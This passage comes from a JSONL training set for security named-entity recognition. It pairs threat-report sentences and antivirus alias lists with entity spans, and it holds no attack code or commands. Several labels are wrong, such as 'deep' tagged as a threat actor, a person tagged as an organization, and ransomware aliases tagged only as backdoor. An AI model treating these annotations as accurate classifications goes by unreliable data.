"cyner2_train_003317", "source": 
"cyner2_train"}} {"text": "By pivoting off of the infrastructure we learned that it is related to Winnti, a Chinese threat actor that is mostly targeting the gaming industry.", "spans": {"SYSTEM: infrastructure": [[23, 37]], "THREAT_ACTOR: Winnti,": [[71, 78]], "THREAT_ACTOR: a Chinese threat actor": [[79, 101]], "ORGANIZATION: the gaming industry.": [[127, 147]]}, "info": {"id": "cyner2_train_003319", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MyDoomI.Kr Win32/Mydoom.BT W32.Dozer Win32/Lyzapo.A WORM_MYDOOM.EA Win.Trojan.Dozer-1 Trojan.Dozer.1 WORM_MYDOOM.EA BehavesLike.Win32.Mydoom.fc W32/Backdoor.VQLJ-7986 Win32.Troj.Undef.kcloud TrojanDropper:Win32/Lyzapo.A Dropper/Win32.DDoS.N19798743 W32/Mydoom.cf Trojan.DR.Lyzapo!rpJ9Iphh7tw W32/Dozzer.A!tr W32/MyDoom.HN.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003320", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader Trojan.DownLoader6.50414 BehavesLike.Win32.Trojan.tm TR/Dldr.Megone.cwqt Trj/CI.A Win32/Trojan.9b4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003323", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.123904.BJ Trojan-GameThief.Win32.Magania!O Backdoor.Zegost.29476 Trojan/Magania.gxtv Trojan.Zusy.Elzob.DD23 Win32.Trojan.Farfli.ai HV_MAGANIA_CA22396F.TOMC Win.Trojan.Magania-15913 Trojan.Win32.Magania.thvzy Troj.GameThief.W32.Magania.l8gE Trojan.KeyLogger.13111 Trojan.Magania.Win32.50884 BehavesLike.Win32.Dropper.ch P2P-Worm.Win32.Palevo Trojan[GameThief]/Win32.Magania Win32.Troj.Transport.b.kcloud Trojan:DOS/Killmbr.dr Trojan.Win32.A.PSW-Magania.285696.A Trojan/Win32.Magania.R41109 BScope.P2P-Worm.Palevo Trojan.Farfli!+e4pBtKCbqs", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003324", "source": "cyner2_train"}} {"text": "Their targets have spanned all across the world, with a focus on government, defense organizations and 
various Eastern European governments.", "spans": {"ORGANIZATION: government, defense organizations": [[65, 98]], "ORGANIZATION: Eastern European governments.": [[111, 140]]}, "info": {"id": "cyner2_train_003325", "source": "cyner2_train"}} {"text": "JS/Nemucod is a JavaScript downloader trojan that targets users through malware spam campaigns.", "spans": {"MALWARE: JavaScript downloader trojan": [[16, 44]]}, "info": {"id": "cyner2_train_003327", "source": "cyner2_train"}} {"text": "This same attacker is also reported to have targeted various military installations in Central Asia in the past", "spans": {"THREAT_ACTOR: attacker": [[10, 18]], "ORGANIZATION: military installations": [[61, 83]]}, "info": {"id": "cyner2_train_003328", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.F222 Backdoor.Bedep.10384 BKDR_BEDEP.SMX Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_BEDEP.SMX Trojan.Win32.Yakes.dsmtzi Trojan.Bedep.62 BehavesLike.Win32.Spyware.cc Trojan.Win32.Crypt Backdoor/Bedep.v TR/Crypt.ZPACK.147808 Trojan[Backdoor]/Win32.Bedep Trojan.Kazy.D9859B Backdoor/Win32.Bedep.R154894 Backdoor.Bedep! 
W32/Bedep.D!tr Win32/Trojan.a60", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003329", "source": "cyner2_train"}} {"text": "The Lazarus group is tied to the 2014 attack on Sony Pictures Entertainment and the 2013 DarkSeoul attacks.", "spans": {"THREAT_ACTOR: The Lazarus group": [[0, 17]], "ORGANIZATION: Sony Pictures Entertainment": [[48, 75]]}, "info": {"id": "cyner2_train_003330", "source": "cyner2_train"}} {"text": "The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus.", "spans": {"ORGANIZATION: The Callisto Group": [[0, 18]], "THREAT_ACTOR: advanced threat actor": [[25, 46]], "ORGANIZATION: military personnel, government officials, think tanks,": [[75, 129]], "ORGANIZATION: journalists": [[134, 145]]}, "info": {"id": "cyner2_train_003333", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9901 TROJ_GRAFTOR_GG3102DA.UVPM TrojWare.Win32.TrojanDownloader.Stantinko.CB Trojan.Kbdmai.83 TROJ_GRAFTOR_GG3102DA.UVPM TR/Downloader.amdkv TrojanDownloader:Win32/Stantinko.A!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003334", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Virut.low6 Trojan.Graftor.D295ED Win32.Trojan.WisdomEyes.16070401.9500.9753 Win.Adware.Downware-564 Trojan/Win32.Unknown Trojan:Win32/Vercuser.A Worm/Win32.VB.R47661 Backdoor.Bot Trj/CI.A I-Worm.Vercuser.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003337", "source": "cyner2_train"}} {"text": "Over the course of 2016 — and particularly intensifying towards the end of the year — several individuals known to Amnesty International were approached via email and through social media by Safeena Malik seemingly an enthusiastic activist with a strong interest in human rights.", "spans": {"ORGANIZATION: Amnesty 
International": [[115, 136]], "ORGANIZATION: social media": [[175, 187]], "ORGANIZATION: Safeena Malik": [[191, 204]], "ORGANIZATION: enthusiastic activist": [[218, 239]], "ORGANIZATION: human rights.": [[266, 279]]}, "info": {"id": "cyner2_train_003338", "source": "cyner2_train"}} {"text": "As Talos is constantly monitoring changes across the threat landscape to ensure that our customers remain protected as threats continue to evolve, we took a deep dive into this malware variant to determine the technical capabilities and characteristics of Floki Bot.", "spans": {"ORGANIZATION: Talos": [[3, 8]], "ORGANIZATION: customers": [[89, 98]], "MALWARE: threats": [[119, 126]], "THREAT_ACTOR: deep": [[157, 161]], "MALWARE: malware variant": [[177, 192]], "MALWARE: Floki Bot.": [[256, 266]]}, "info": {"id": "cyner2_train_003342", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Malware.1 Win32.HEURCrypted Trojan.DownLoad.31887 TR/Spy.197632.C Heuristic.BehavesLike.Win32.Packed.C W32/Tibs.WA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003343", "source": "cyner2_train"}} {"text": "According to the public information, cfm.com.ua domain belongs to the «Crystal Finance Millennium» software developer.", "spans": {"ORGANIZATION: the «Crystal Finance Millennium» software developer.": [[66, 118]]}, "info": {"id": "cyner2_train_003344", "source": "cyner2_train"}} {"text": "Quick Sunday morning blog post, analysis of an unknown rtf file.", "spans": {}, "info": {"id": "cyner2_train_003346", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.JP.E5BA68 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Trojan.Win32.9728.ikjtj Trojan.DownLoader3.22821 Trojan.Win32.Swisyn TR/Dldr.Quillo.A Trojan/Win32.Unknown TrojanDownloader:Win32/Quillo.A Trojan/Win32.HDC.C3028 Trojan.DL.Quillo!tw5+WNEhU5A W32/Downloader_x.FYF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003347", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Blouiroet Trojan.Win32.Blouiroet.dx Trojan.Win32.Strictor.ewsjhc Troj.W32.Blouiroet!c Trojan.Blouiroet.Win32.43 BehavesLike.Win32.DlHelper.tc Trojan.Blouiroet.an TR/Blouiroet.shppj Trojan/Win32.Blouiroet Trojan.Zusy.D3860E Trojan.Win32.Z.Zusy.1282560 Trojan.Win32.Blouiroet.dx Trojan.Win32.Delf Trj/CI.A Win32/Trojan.c62", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003348", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Lebreat.18944 Worm.Lebreat.Win32.18 W32/Lebreat.l Trojan.Win32.Lebreat.emyp W32/Breatle.L@mm W32.Spybot.Worm Win32/Lebreat.R Worm.Lebreat.D Net-Worm.Win32.Lebreat.l W32.W.Lebreat.l!c Worm.Win32.Lebreat.R Win32.HLLW.Breat BehavesLike.Win32.Backdoor.lc W32/Breatle.VJCM-5821 I-Worm/Lebreat.a DcomRpc.G!exploit Worm[Net]/Win32.Lebreat Win32/Lebreat.worm.18944.B Worm:Win32/Reatle.L@mm Worm.Lebreat Win32.Worm-net.Lebreat.Hugg Worm.Win32.Lebreat.l", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003349", "source": "cyner2_train"}} {"text": "They range from the recreational apps like games, skins, and themes to phone optimization boosters.", "spans": {}, "info": {"id": "cyner2_train_003350", "source": "cyner2_train"}} {"text": "The AlienVault team has researched and added more IOC s found in the OTX portal.", "spans": {"ORGANIZATION: The AlienVault team": [[0, 19]], "SYSTEM: the OTX portal.": [[65, 80]]}, "info": {"id": "cyner2_train_003352", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.Teamspy.34816.C TrojanSpy.Skeeyah Win32.Trojan.WisdomEyes.16070401.9500.9565 Backdoor.Noknef TSPY_KONNI.A Trojan-Spy.Win32.Teamspy.jb Trojan.Win32.Teamspy.eojkym Troj.Spy.W32!c Trojan.DownLoader25.6499 TSPY_KONNI.A W32/Trojan.TMQM-1890 TrojanSpy.Teamspy.al TR/Taranis.4651 Trojan[Spy]/Win32.TeamSpy Trojan-Spy.Win32.Teamspy.jb Backdoor:Win32/Konny.A Spyware.Infostealer.86016 TrojanSpy.Teamspy 
Trojan.PasswordStealer Win32.Trojan-spy.Teamspy.Phgj TrojanSpy.Teamspy!7hsJ3qOc7gU Trojan.Taranis Trj/GdSda.A Win32/Trojan.6af", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003356", "source": "cyner2_train"}} {"text": "In mid-2022, Mandiant, in collaboration with Fortinet, investigated the exploitation and deployment of malware across multiple Fortinet solutions including FortiGate firewall, FortiManager centralized management solution, and FortiAnalyzer log management, analytics, and reporting platform.", "spans": {"ORGANIZATION: Mandiant,": [[13, 22]], "ORGANIZATION: Fortinet,": [[45, 54]], "MALWARE: exploitation": [[72, 84]], "MALWARE: malware": [[103, 110]], "ORGANIZATION: Fortinet": [[127, 135]], "SYSTEM: FortiGate firewall, FortiManager centralized management solution,": [[156, 221]], "SYSTEM: FortiAnalyzer log management, analytics, and reporting platform.": [[226, 290]]}, "info": {"id": "cyner2_train_003357", "source": "cyner2_train"}} {"text": "This malware can intercept the user's personal data, such as SMS messages, MMS messages, and USSD requests.", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: user's personal data,": [[31, 52]]}, "info": {"id": "cyner2_train_003358", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Supermm.1.0.B Backdoor/W32.SuperMM.251764 Backdoor.Win32.SuperMM.10!O BackDoor-ACL.dll Backdoor/SuperMM.10.b W32/Backdoor.MRCA-2263 Backdoor.Trojan Backdoor.Supermm.1.0.B Backdoor.Win32.SuperMM.10.b Backdoor.Supermm.1.0.B Trojan.Win32.SuperMM-10.gtre Backdoor.Win32.Z.Supermm.251764 Backdoor.W32.Supermm!c Backdoor.Supermm.1.0.B Backdoor.Win32.SuperMM.10.B Backdoor.Supermm.1.0.B BackDoor.SuperMM.10 Backdoor.SuperMM.Win32.7 BackDoor-ACL.dll Trojan/PSW.Oicqmm98.Dll Trojan[Backdoor]/Win32.SuperMM Backdoor.Supermm.1.0.B Backdoor.Win32.SuperMM.10.b Backdoor:Win32/SuperMM.B Backdoor.Supermm.1.0.B Backdoor.SuperMM Win32/SuperMM.10.B Win32.Backdoor.Supermm.Tayo Trojan.Win32.Supermm 
BDoor.ACL!tr.bdr Win32/Backdoor.831", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003360", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Truvasys TSPY_LIMITAIL.XXUDN Trojan.Win32.StrongPity.ekmtaw Troj.W32.Strongpity!c TSPY_LIMITAIL.XXUDN Trojan.StrongPity.j TR/StrongPity.vtcv Trojan/Win32.StrongPity Backdoor:Win32/Truvasys.A!dha PUP/Win32.DealPly.C2030575 Trojan.StrongPity! Trojan.StrongPity Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003361", "source": "cyner2_train"}} {"text": "The adware Trojan in fact potentially allows full remote access to the infected device.", "spans": {"MALWARE: The adware Trojan": [[0, 17]], "SYSTEM: the infected device.": [[67, 87]]}, "info": {"id": "cyner2_train_003362", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Bublik!O Trojan.Bublik.Win32.6109 W32.W.AutoRun.l0qv Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.VB.xswue BehavesLike.Win32.Emotet.dh Trojan/Bublik.ccj Trojan/Win32.Bublik Trojan.Barys.D7D1 Trojan:Win32/Klovbot.B Trojan/Win32.VBNA.R146461 Trj/CI.A Trojan.Bublik!ZPZ98Vxhajk W32/VBKrypt.CFFF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003363", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Backdoor.Win32.Androm.oyzg Trojan.Win32.Androm.exrcqp Trojan.DownLoader26.14208 BehavesLike.Win32.Trojan.cc Trojan.MSIL.Crypt TR/Dropper.MSIL.ruzhp Backdoor.Win32.Androm.oyzg Trj/GdSda.A Win32.Backdoor.Androm.Ajls MSIL/Kryptik.BLU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003364", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanspy.Enkalogs TSPY_KEYLOG.AUSJOZ Win32.Trojan.WisdomEyes.16070401.9500.9994 TSPY_KEYLOG.AUSJOZ Trojan.Win32.Keylogger.evqveo Trojan.Win32.Z.Kazy.30722 W32/Application.BPVK-3177 Trojan.Kazy.D8E58F TrojanSpy:MSIL/Enkalogs.A Trj/GdSda.A 
MSIL/Keylogger.II!tr.spy Win32/Trojan.40d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003366", "source": "cyner2_train"}} {"text": "CyberX has discovered a new, large-scale cyber-reconnaissance operation targeting a broad range of targets in the Ukraine.", "spans": {"ORGANIZATION: CyberX": [[0, 6]], "THREAT_ACTOR: large-scale cyber-reconnaissance operation": [[29, 71]], "ORGANIZATION: targets": [[99, 106]]}, "info": {"id": "cyner2_train_003367", "source": "cyner2_train"}} {"text": "Since the plugin development pattern is generic and the plugin SDK can be easily embedded, the plugin architecture could be a trend among Android malware in the future.", "spans": {"SYSTEM: plugin SDK": [[56, 66]], "SYSTEM: plugin architecture": [[95, 114]], "MALWARE: Android malware": [[138, 153]]}, "info": {"id": "cyner2_train_003371", "source": "cyner2_train"}} {"text": "A commercially available RAT.", "spans": {"MALWARE: RAT.": [[25, 29]]}, "info": {"id": "cyner2_train_003372", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.JPIS Trojan.Downloader.JPIS Trojan.Downloader.JPIS TROJ_DALBOT.SMRR Win32.Trojan.WisdomEyes.16070401.9500.9750 TROJ_DALBOT.SMRR Win.Trojan.Leepload-1 Trojan.Downloader.JPIS Trojan.Downloader.JPIS Trojan.Win32.DloadrDOI.sxvve Trojan.Win32.A.Downloader.73728.ABY Trojan.Downloader.JPIS Trojan.DownLoader6.34186 W32/Trojan.USUV-7153 Trojan/Win32.Unknown TrojanDownloader:Win32/Dalbot.A Win-Trojan/Dalbot.73728 Win32/Trojan.b77", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003373", "source": "cyner2_train"}} {"text": "We have reported the bug to Adobe who assigned it CVE-2017-11292 and released a patch earlier today", "spans": {"ORGANIZATION: Adobe": [[28, 33]]}, "info": {"id": "cyner2_train_003374", "source": "cyner2_train"}} {"text": "This particular application is signed with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown 
Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15 : A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware .", "spans": {}, "info": {"id": "cyner2_train_003376", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Autorun.VX Trojan/W32.Cosmu.214528.B Trojan.Win32.Cosmu!O Worm.Nenebra.AP8 Win32.Worm.Delf.ca W32/Cosmu.C W32.SillyFDC Win32/Cosmu.AO Win.Trojan.Cosmu-268 Win32.Worm.Autorun.VX Trojan-Ransom.Win32.Blocker.iwkz Win32.Worm.Autorun.VX Trojan.Win32.Cosmu.vifkp Trojan.Win32.A.Cosmu.212480[UPX] Win32.Trojan.Blocker.Wnme Win32.Worm.Autorun.VX Win32.Worm.Autorun.VX Win32.HLLW.Autoruner.57682 Trojan.Cosmu.Win32.9114 W32/Cosmu.KVSE-8775 Trojan/Cosmu.gje WORM/Nenebra.A Trojan/Win32.Cosmu Win32.Worm.Autorun.VX Troj.Ransom.W32.Blocker!c Worm:Win32/Nenebra.A Win32.Worm.Autorun.VX TScope.Trojan.Delf Worm.AutoRun Trojan.Cosmu Win32/AutoRun.Delf.HF Trojan.Cosmu!gKBhUwtv5Oc Trojan-Downloader.Win32.Banload W32/Cosmu.XXS!tr W32/Autorun.JYX Win32/Worm.00b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003377", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D2ECF0 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader26.14415 BehavesLike.Win32.Trojan.cc W32/Trojan.UDBU-2080 TR/Crypt.Xpack.dmslo Backdoor/Win32.Androm.C2026756 Trj/GdSda.A Trojan.Win32.Injector Win32/Trojan.bd4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003378", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Runner.T Trojan/W32.Runner.2560.C Trojan.Win32.Runner!O Trojan.Runner.T W32/Runner.A Trojan.Runner.T Trojan.Win32.Runner.s Trojan.Runner.T Trojan.Runner.T 
Trojan.Win32.Runner W32/Runner.A Trojan/PSW.Almat.xs Trojan:Win32/Runner.D Troj.Dropper.W32.Small.kZ2V Trojan.Win32.Runner.s Trojan/Win32.Runner.C82211 Trojan.Runner.T HEUR/QVM39.1.CC7B.Trojan.Win32.Runner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003379", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.FC.6901 Trojan.Zusy.D1C473 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win64.Miner.re Trojan.Win32.Diztakun.dbjduc Trojan.Win32.Z.Zusy.37376.CM BehavesLike.Win32.PWSZbot.nm Trojan.Win32.Diztakun Trojan/Win64.Miner TrojanSpy:MSIL/Logstel.A Trojan.Win64.Miner.re Trj/GdSda.A Win64.Trojan.Miner.Dxwy Win32/Trojan.Spy.8ab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003380", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Hamaetot.A3 Trojan.Razy.D176F BKDR_HAMAETOT.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_HAMAETOT.SM Win.Trojan.Stainz-1 Trojan.DownLoader9.62446 BehavesLike.Win32.Trojan.mm Backdoor/MSIL.vh Trojan/Win32.MSILBot Backdoor:MSIL/Hamaetot.A Win32.Outbreak", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003381", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Small.eftzxb TrojWare.MSIL.Tiny.HA Trojan.PWS.Stealer.18264 Trojan.MSIL.Small PWS:MSIL/OnLineGames.NW!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003382", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.90AF Win32.Trojan.WisdomEyes.16070401.9500.9998 Packed.Win32.Katusha.o Trojan.Win32.Waledac Trojan.Heur.TDss.EF7F42 Packed.Win32.Katusha.o BScope.Trojan.MTA.0795", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003385", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.VBKrypt!O VBObfus.m Trojan/VBKrypt.cyuv Trojan.VBKrypt.55 Win32.Worm.Autorun.l W32.Changeup WORM_VOBFUS.SMHF Win.Trojan.Changeup-6169544-0 
Worm.Win32.WBNA.ipa Trojan.Win32.WBNA.dxinid Troj.PSW32.W.VB.lPYN Win32.HLLW.Autoruner.49334 WORM_VOBFUS.SMHF BehavesLike.Win32.VBObfus.dm TR/VBKrypt.cyuv.30 Worm:Win32/Vbnoet.A Trojan.Win32.A.VBKrypt.258048 Worm.Win32.WBNA.ipa Trojan/Win32.VBKrypt.R5059 Trojan-Dropper.Krumkach.11521", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003386", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.MSIL Trojan.Win32.Z.Razy.20992.AYN Troj.Downloader.Msil!c Trojan.DownLoader25.50379 W32/Trojan.SKRD-4085 TrojanDownloader.MSIL.pxb Trojan.Razy.D361CA Backdoor:MSIL/Quasarat.A!bit Trj/GdSda.A Trojan.FOIG!tr Win32/Trojan.116", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003387", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL Ransom.FileCryptor Troj.Ransom.Msil!c Win32.Trojan.WisdomEyes.16070401.9500.9811 W32/Ransom.TAAZ-2840 Trojan.Win32.Ransom.ewmfpk Trojan.Encoder.5035 BehavesLike.Win32.Trojan.pc Trojan-Ransom.FileCoder Trojan.MSIL.hyys TR/Ransom.cgaxa Trj/GdSda.A Win32.Trojan.Raas.Auto MSIL/Filecoder.AC!tr Win32/Trojan.Ransom.568", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003388", "source": "cyner2_train"}} {"text": "Moroever, the vawtrak sample we got downloads a new memory scraping malware that scans for credit card data in memory.", "spans": {"MALWARE: vawtrak": [[14, 21]], "MALWARE: memory scraping malware": [[52, 75]]}, "info": {"id": "cyner2_train_003389", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanpws.Cosratu TrojWare.MSIL.Cosratu.QOA Trojan.PWS.Stealer.20141 TR/Downloader.aymho PWS:MSIL/Cosratu.A!bit Trj/GdSda.A Trojan.Razy.D36F19 Trojan.MSIL.PSW Win32/Trojan.480", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003390", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojannotifier.Phinot Trojan/Phinot.120 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor.HHE 
Backdoor.Trojan Win32/Small.BX TROJ_PHINOT.A Trojan-Notifier.Win32.Phinot.120 Trojan.Win32.Phinot.hkgh Trojan.Popon Trojan.Phinot.Win32.1 Trojan.Win32.DNSChanger W32/Backdoor.HEXL-8738 Trojan/Delf.Phinot.a Trojan[Notifier]/Win32.Phinot Win32.Troj.Phinot.12.kcloud Trojan.Heur.GZ.E38D33 Troj.Notifier.W32.Phinot.120!c Trojan-Notifier.Win32.Phinot.120 Win32.Trojan.Phinot.Wstw Trojan.Phinot!Cq2wyKHab1w W32/Phinot.120!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003391", "source": "cyner2_train"}} {"text": "Evidence suggests that the tool is being used as part of a very targeted campaign, focused on Chinese nationals in commercial organizations.", "spans": {"ORGANIZATION: Chinese nationals": [[94, 111]], "ORGANIZATION: commercial organizations.": [[115, 140]]}, "info": {"id": "cyner2_train_003392", "source": "cyner2_train"}} {"text": "Reports emerged just over a week ago of a new cyber-enabled bank heist in Asia.", "spans": {}, "info": {"id": "cyner2_train_003393", "source": "cyner2_train"}} {"text": "These attacks are highly targeted, appear to re-purpose legitimate content in decoy documents, and had very low antivirus AV detection rates at the time they were deployed.", "spans": {}, "info": {"id": "cyner2_train_003394", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Hupigon.516096.L Downloader.Small.11945 Win32.Trojan.WisdomEyes.16070401.9500.9812 Win32/Citeary.B HV_DOWN.98AC8B50 Win.Trojan.Small-20870 Trojan-Dropper.Win32.Small.hms Trojan.Win32.Small.dlprwb Trojan.DownLoader3.7934 TrojanDropper.Small.fam Trojan[Downloader]/Win32.Small Trojan-Dropper.Win32.Small.hms Win32/TrojanDownloader.Small.PJP Win32.Trojan-dropper.Small.Taow Trojan.DR.Small!DUb+rE11TVI W32/Small.HMS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003396", "source": "cyner2_train"}} {"text": "We have named this Ransomware KeRanger. 
The only previous ransomware for OS X we are aware of is FileCoder, discovered by Kaspersky Lab in 2014.", "spans": {"MALWARE: Ransomware KeRanger.": [[19, 39]], "MALWARE: ransomware": [[58, 68]], "SYSTEM: OS X": [[73, 77]], "MALWARE: FileCoder,": [[97, 107]], "ORGANIZATION: Kaspersky Lab": [[122, 135]]}, "info": {"id": "cyner2_train_003397", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BhoSearcher.B Trojan.BhoSearcher.B Trojan.BhoSearcher.B Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_DURSG.A Trojan.BhoSearcher.B Trojan.BhoSearcher.B Trojan.BhoSearcher.B Trojan.BhoSearcher.10 TROJ_DURSG.A BehavesLike.Win32.Injector.nt Trojan-Downloader.Win32.ConHook Trojan:Win32/Dursg.A Trojan/Win32.ConHook.C286311 Trojan.Dursg!2KwSbji4syo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003399", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.7E63 Trojan.Win32.Patched!O Trojan.Patched.LI Win32.Trojan.WisdomEyes.16070401.9500.9933 Troj.W32.Patched.lm1y Virus.Win32.Loader.q Trojan.Patched.Win32.43121 Possible_HackToolPatched.UNP BehavesLike.Win32.NGVCK.dh Win32/PatchFile.gc TR/Patched.LI.1 HackTool:Win32/Patched.Y Win-Trojan/Patched.4095 Trojan.Win32.Patched W32/Patched.AW Win32/Trojan.bc4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003400", "source": "cyner2_train"}} {"text": "It is under constant development, with several updated versions appearing since the original samples were observed in June 2017.", "spans": {}, "info": {"id": "cyner2_train_003402", "source": "cyner2_train"}} {"text": "FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "VULNERABILITY: exploiting": [[38, 48]], "MALWARE: malware payloads": [[89, 105]], "MALWARE: malware families.": [[132, 149]]}, "info": {"id": "cyner2_train_003403", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Ransom_Foreign.R002C0DKO17 W32/Trojan.ZJNJ-1589 Ransom_Foreign.R002C0DKO17 Trojan-Ransom.Win32.Foreign.nhnn Trojan.Win32.Kovter.ehmnac Trojan.ForeignCRTD.Win32.4896 W32/Trojan3.XSL Trojan.Adware.a TR/Crypt.ZPACK.gnual Trojan[Ransom]/Win32.Foreign Trojan-Ransom.Win32.Foreign.nhnn Trojan/Win32.Foreign.C1610813 BScope.Trojan-Banker.Buhtrap Trj/CI.A Trojan.Foreign Win32/TrojanDownloader.Small.ASE Win32.Trojan.Foreign.Lknk Trojan.Foreign!RxgoGgLK0WM PUA.Adstantinko W32/Small.ASE!tr Win32/Trojan.f8a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003405", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Nuker.216576 Tool.WinNuke.Win32.3 Trojan/WinNuke.a Exploit.Win32.Nuker-WinNuke.htmy W32/TrojanX.ACD Nuker.IE Exploit.Win32.Nuker.WinNuke.a Win32.Exploit.Nuker.bhro TrojWare.Win32.Nuker.WinNuke Nuke.WinNuke W32/Trojan.GJZE-2894 Nuke/WinNuke.a TR/WinNuke.A Trojan[Exploit]/Win32.Nuker Win32.Hack.WinNuke.a.kcloud Trojan:Win16/WinNuke.A Win-Trojan/Winnuke.216576 Nuker.WinNuke Win32/Nuker.WinNuke Nuker.Win32.WinNuke W32/WinNuke.A!tr Nuker.DL Win32/Trojan.750", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003406", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Small Trojan.Graftor.D1F62C BKDR_ZIYANG.A Backdoor.Trojan.B BKDR_ZIYANG.A Backdoor.Win32.Small.liq 